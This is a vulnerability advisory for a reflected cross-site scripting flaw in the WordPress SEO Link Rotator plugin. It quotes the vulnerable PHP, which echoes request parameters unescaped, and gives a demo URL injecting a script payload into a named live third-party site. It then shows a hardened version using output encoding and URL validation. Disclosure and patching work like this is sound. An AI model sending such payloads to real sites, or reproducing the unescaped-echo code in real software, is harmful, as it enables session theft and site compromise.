
WordPress Seo Link Rotator Cross Site Scripting

Posted on 28 January 2014

######################
# Exploit Title : Wordpress Seo Link Rotator Plugin Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://www.seolinkrotator.com
# Software Link : http://www.seolinkrotator.com/download/files/seolinkrotator.zip
# Date : 2014-01-19
# Tested on : Windows 7 / Mozilla Firefox Web Browser
# Discovered by : ACC3SS
######################
# Vulnerability code :

<?php
$action = $_GET['action'];
switch($action){
    case "buildLink":
        $linkURL = $_GET['URL'];
        $linkTitle = urldecode($_GET['title']);
        $type = $_GET['type'];
?>
<div class="seoLinkRotatorInfo">
    <h2>Link To This <?=ucwords($type)?></h2>
    <p>If you would like to share this <?=$type?> with someone else just copy and paste the HTML into one of your pages:</p>
    <div class="seoLinkHTMLBox">
        <?php echo '<a href="' . $linkURL . '">' . $linkTitle . '<a>'; ?>
    </div>
</div>
<?php
        break;
    default:
        echo 'Unkown action';
        break;
}
?>

######################
# Location : localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss]
######################
# Demo :
# http://www.porterpr.com/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title= "/><script>alert(1);</script>
######################
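The branch quoted above echoes the `URL`, `title` and `type` parameters into the response without any output encoding. A hardened form of the same branch follows as an added example; it is not the plugin's or the advisory author's code. The helper names `h`, `safe_url` and `param` are hypothetical, and the example assumes pusher.php is requested directly without WordPress loaded, so it uses plain PHP functions only.

```php
<?php
// Added example: hardened form of the buildLink branch. h(), safe_url() and
// param() are hypothetical helpers, not part of the plugin.
function h(string $s): string {
    // Encode for HTML text and quoted-attribute contexts.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function safe_url(string $url): ?string {
    // Accept only absolute http(s) URLs; javascript:, data: and relative values fail.
    $scheme = parse_url(trim($url), PHP_URL_SCHEME);
    $ok = is_string($scheme) && in_array(strtolower($scheme), ['http', 'https'], true);
    return $ok ? trim($url) : null;
}

function param(string $name): string {
    // $_GET is already URL-decoded, so no second urldecode(); arrays (title[]=) become ''.
    $v = $_GET[$name] ?? '';
    return is_string($v) ? $v : '';
}

switch (param('action')) {
    case 'buildLink':
        $linkURL = safe_url(param('URL'));
        if ($linkURL === null) {
            http_response_code(400);
            echo 'Invalid URL';
            break;
        }
        $linkTitle = param('title');
        $type = param('type');
        ?>
<div class="seoLinkRotatorInfo">
    <h2>Link To This <?= h(ucwords($type)) ?></h2>
    <p>If you would like to share this <?= h($type) ?> with someone else just copy and paste the HTML into one of your pages:</p>
    <div class="seoLinkHTMLBox">
        <a href="<?= h($linkURL) ?>"><?= h($linkTitle) ?></a>
    </div>
</div>
        <?php
        break;
    default:
        echo 'Unknown action';
        break;
}
```

With a valid `URL` parameter and the `title` value from the advisory, the title is emitted as inert text (`&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt;`) instead of markup.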

 
